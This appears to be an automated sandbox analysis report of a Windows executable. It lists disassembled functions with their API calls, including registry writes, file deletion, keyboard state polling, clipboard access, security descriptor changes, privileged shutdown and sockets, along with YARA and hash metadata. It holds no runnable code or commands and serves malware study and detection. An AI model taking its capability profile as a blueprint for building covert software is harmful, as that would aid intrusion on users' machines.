                                                    Function 00680AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680BDE
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0068F910,00000000,?,00000000,?,?), ref: 00680C4C
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00680C94
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00680D1D
                                                    • RegCloseKey.ADVAPI32(?), ref: 0068103D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0068104A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: 5bcfd17acc9a694275f6020674e2056470c800804fff5e6e0d272dc93f051ba5
                                                    • Instruction ID: dbd6db45e919a08df5769e2bc6fc993465f12ed4a0b5e758c03656c1a9eb8064
                                                    • Opcode Fuzzy Hash: 5bcfd17acc9a694275f6020674e2056470c800804fff5e6e0d272dc93f051ba5
                                                    • Instruction Fuzzy Hash: 0602AC752006119FCB54EF18C881E6AB7E6FF89714F04895DF88A9B3A2CB30EC41CB85
                                                    Function 0066F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0066F37E
                                                    • _wcscmp.LIBCMT ref: 0066F393
                                                    • _wcscmp.LIBCMT ref: 0066F3AA
                                                      • Part of subcall function 006645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006645DC
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0066F3D9
                                                    • FindClose.KERNEL32(00000000), ref: 0066F3E4
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0066F400
                                                    • _wcscmp.LIBCMT ref: 0066F427
                                                    • _wcscmp.LIBCMT ref: 0066F43E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066F450
                                                    • SetCurrentDirectoryW.KERNEL32(006BA5A0), ref: 0066F46E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F478
                                                    • FindClose.KERNEL32(00000000), ref: 0066F485
                                                    • FindClose.KERNEL32(00000000), ref: 0066F497
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: bd29365e20c5579096d8d822a9592a96c7d7beb4900f3e262fa6eda40469d97e
                                                    • Instruction ID: 6a8c259ce7baf41055d1b9dd1681b7db2418919af1fb3b6b007c71776dd9a3ed
                                                    • Opcode Fuzzy Hash: bd29365e20c5579096d8d822a9592a96c7d7beb4900f3e262fa6eda40469d97e
                                                    • Instruction Fuzzy Hash: 3831B5725012197BCF10ABA4FC98ADE77AF9F49360F100275E850E32A1DB75DE85CBA4
                                                    Function 006581F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658766
                                                      • Part of subcall function 0065874A: GetLastError.KERNEL32(?,0065822A,?,?,?), ref: 00658770
                                                      • Part of subcall function 0065874A: GetProcessHeap.KERNEL32(00000008,?,?,0065822A,?,?,?), ref: 0065877F
                                                      • Part of subcall function 0065874A: HeapAlloc.KERNEL32(00000000,?,0065822A,?,?,?), ref: 00658786
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0065879D
                                                      • Part of subcall function 006587E7: GetProcessHeap.KERNEL32(00000008,00658240,00000000,00000000,?,00658240,?), ref: 006587F3
                                                      • Part of subcall function 006587E7: HeapAlloc.KERNEL32(00000000,?,00658240,?), ref: 006587FA
                                                      • Part of subcall function 006587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00658240,?), ref: 0065880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0065825B
                                                    • _memset.LIBCMT ref: 00658270
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065828F
                                                    • GetLengthSid.ADVAPI32(?), ref: 006582A0
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 006582DD
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006582F9
                                                    • GetLengthSid.ADVAPI32(?), ref: 00658316
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00658325
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0065832C
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065834D
                                                    • CopySid.ADVAPI32(00000000), ref: 00658354
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00658385
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006583AB
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006583BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 9c98b356cc66e55d3cfb2aaf3c62f207e45754947715167a700ee3783aa46595
                                                    • Instruction ID: b8b954285e08be581cd98d2de8adf1f215c7b588b2aeb2ca37d4ddfd9f7e1b81
                                                    • Opcode Fuzzy Hash: 9c98b356cc66e55d3cfb2aaf3c62f207e45754947715167a700ee3783aa46595
                                                    • Instruction Fuzzy Hash: E6614971900219AFDF109FA4DC84AEEBBBAFF04701F148269F815A7291DB319A09CB60
                                                    Function 00616843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oaa$PJj$UCP)$UTF)$UTF16)
                                                    • API String ID: 0-3778967012
                                                    • Opcode ID: 4a299687a83bf36d439221ae994ed3428d2ad221a025e960c061e345e9ea5c7a
                                                    • Instruction ID: e30a69a2b9a430af777a71232eafd683407c02490103615bda78f90c0052ae91
                                                    • Opcode Fuzzy Hash: 4a299687a83bf36d439221ae994ed3428d2ad221a025e960c061e345e9ea5c7a
                                                    • Instruction Fuzzy Hash: B6728275E002199BDB24DF58D8807EEB7B6FF49310F18816AE859EB390DB709D85CB90
                                                    Function 00680665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680737
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006807D6
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0068086E
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00680AAD
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00680ABA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: d4b91821a4c68852134675429aa6dfe3e0c124cdad5553208729417bef049fcb
                                                    • Instruction ID: 2dca062366897e8a56710b8ec03bc47bd44fb1443ff71084410466c1340ef156
                                                    • Opcode Fuzzy Hash: d4b91821a4c68852134675429aa6dfe3e0c124cdad5553208729417bef049fcb
                                                    • Instruction Fuzzy Hash: CAE14F31204210AFDB54EF28C891D6BBBE6EF89714F04896DF459DB2A2DB30E905CB51
                                                    Function 00660219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00660241
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 006602C2
                                                    • GetKeyState.USER32(000000A0), ref: 006602DD
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 006602F7
                                                    • GetKeyState.USER32(000000A1), ref: 0066030C
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00660324
                                                    • GetKeyState.USER32(00000011), ref: 00660336
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0066034E
                                                    • GetKeyState.USER32(00000012), ref: 00660360
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00660378
                                                    • GetKeyState.USER32(0000005B), ref: 0066038A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 3cafc7b34b417a85d2d749927eefe9a0d333aedf07ba9dc33ef12b6d93f24ec3
                                                    • Instruction ID: 267db360d3fdeee6f2288a64cffdc2fe19339e041fe3725395296fc427fdfcb8
                                                    • Opcode Fuzzy Hash: 3cafc7b34b417a85d2d749927eefe9a0d333aedf07ba9dc33ef12b6d93f24ec3
                                                    • Instruction Fuzzy Hash: 8841D4305047CA6BFF718B6088183E7BAA6AF12341F0840BDD5C6567C2EBD45AC887A2
                                                    Function 00674458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: db350c73cc3ab667eb0ca3cce25f1dc3c60f47a3be2b67fe3a1a071c3d539501
                                                    • Instruction ID: c3c159d36f9728cd130923d412a10ac47c81c2eef2f93b0d885e7fedae6a6a83
                                                    • Opcode Fuzzy Hash: db350c73cc3ab667eb0ca3cce25f1dc3c60f47a3be2b67fe3a1a071c3d539501
                                                    • Instruction Fuzzy Hash: CF218135340210AFDB10AF64EC49B6E77ABEF04715F10C12AF94ADB2A2DB75AD01CB58
                                                    Function 00663A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006048A1,?,?,006037C0,?), ref: 006048CE
                                                      • Part of subcall function 00664CD3: GetFileAttributesW.KERNEL32(?,00663947), ref: 00664CD4
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00663ADF
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00663B87
                                                    • MoveFileW.KERNEL32(?,?), ref: 00663B9A
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00663BB7
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00663BD9
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00663BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: a6020965b16eacb95517feeb7666d89cff1ddab58acdfc125e95381afd5d66ac
                                                    • Instruction ID: 62859ffa1f990c04596765595fecc94bd809ca01ff9731b1e64b906233484490
                                                    • Opcode Fuzzy Hash: a6020965b16eacb95517feeb7666d89cff1ddab58acdfc125e95381afd5d66ac
                                                    • Instruction Fuzzy Hash: 5651833184125D9ACF59EBA0CD929EEB77AAF14300F64416DE442772D1DF316F09CBA4
                                                    Function 00614140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$Oaa$VUUU$VUUU$VUUU$VUUU
                                                    • API String ID: 0-3338701262
                                                    • Opcode ID: ea433db9d7360129566a8b3476fc19441a713d7835a862cf9a57cb519701620e
                                                    • Instruction ID: 059e4a118d96145ea6342bcc55c966bf97e8008777c9df9b31219ed73503601c
                                                    • Opcode Fuzzy Hash: ea433db9d7360129566a8b3476fc19441a713d7835a862cf9a57cb519701620e
                                                    • Instruction Fuzzy Hash: D0A25D74E0421A8BDF24CF58C9907EDB7B2BF55314F1885AAD85AA7380DB309EC5DB90
                                                    Function 0066F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0066F6AB
                                                    • Sleep.KERNEL32(0000000A), ref: 0066F6DB
                                                    • _wcscmp.LIBCMT ref: 0066F6EF
                                                    • _wcscmp.LIBCMT ref: 0066F70A
                                                    • FindNextFileW.KERNEL32(?,?), ref: 0066F7A8
                                                    • FindClose.KERNEL32(00000000), ref: 0066F7BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: ca99d784d26562f339a04166c557137204345b0494b7beacba6aa01c32e758e4
                                                    • Instruction ID: bfc726ea3d7ef1041e43b4e34c7bc0b66ce6335ebca9588f3f86837006f1e02c
                                                    • Opcode Fuzzy Hash: ca99d784d26562f339a04166c557137204345b0494b7beacba6aa01c32e758e4
                                                    • Instruction Fuzzy Hash: DD41A27190021AAFCF54DF64EC85AEEBBB6FF05310F14456AE815A32A0DB309E84CF94
                                                    Function 006158C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 3e87661a3f3a3edfdb3f39419f8d25f0183c957a0f2099b86a8ba2030129b9de
                                                    • Instruction ID: 3368f8b6c3819f7f60236c28a45b31decf9efa430d791602b2a49ba2e9197ac1
                                                    • Opcode Fuzzy Hash: 3e87661a3f3a3edfdb3f39419f8d25f0183c957a0f2099b86a8ba2030129b9de
                                                    • Instruction Fuzzy Hash: B412A970A00A09EFDF14CFA4D981AEEF3B6FF48300F144669E806A7291EB35AD55CB54
                                                    Function 00615680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                    • _memmove.LIBCMT ref: 0065062F
                                                    • _memmove.LIBCMT ref: 00650744
                                                    • _memmove.LIBCMT ref: 006507EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID: yZa
                                                    • API String ID: 1300846289-3732958941
                                                    • Opcode ID: 0e9de4375763adb255532050f66dcff30c0e1113adf98db3a44276eff3cacd51
                                                    • Instruction ID: f06b0cdb418e6f7a80aa537705f1e75ec65ba55f26be9122bcce45f95926242a
                                                    • Opcode Fuzzy Hash: 0e9de4375763adb255532050f66dcff30c0e1113adf98db3a44276eff3cacd51
                                                    • Instruction Fuzzy Hash: 8B02AFB0E00219DFDF44DF64D981AAEBBB6EF84300F1480A9E806DB395EB31D955CB95
                                                    Function 0066545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00658CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00658D0D
                                                      • Part of subcall function 00658CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658D3A
                                                      • Part of subcall function 00658CC3: GetLastError.KERNEL32 ref: 00658D47
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0066549B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 2e6cbe75fd418e7980a404da46b6df617f071c590a7f5717a47006ba911a184c
                                                    • Instruction ID: cd5478c4fea4e9e857deebb0ad16d841749c2d28d9f3ac9c95942f13348ea05c
                                                    • Opcode Fuzzy Hash: 2e6cbe75fd418e7980a404da46b6df617f071c590a7f5717a47006ba911a184c
                                                    • Instruction Fuzzy Hash: 5E012431654A112FE7286374EC4BBFA72DAEB04343F2402B4FC07E21C2DE510C848294
                                                    Function 00613190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID: Oaa
                                                    • API String ID: 674341424-3268679879
                                                    • Opcode ID: ac937fe0b4d50b4c014805e91d1ac5f72fd4fcdcc3db74eae76093899b09d52b
                                                    • Instruction ID: 60a6672a8c38376d4ccf429bd013b8a0d252c18dd5f7ddded8870d38242be80e
                                                    • Opcode Fuzzy Hash: ac937fe0b4d50b4c014805e91d1ac5f72fd4fcdcc3db74eae76093899b09d52b
                                                    • Instruction Fuzzy Hash: 3B229A716083119FC764DF24C881BABB7E7AF84700F18491DF89A97392DB70EA45CB96
                                                    Function 00676596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006765EF
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006765FE
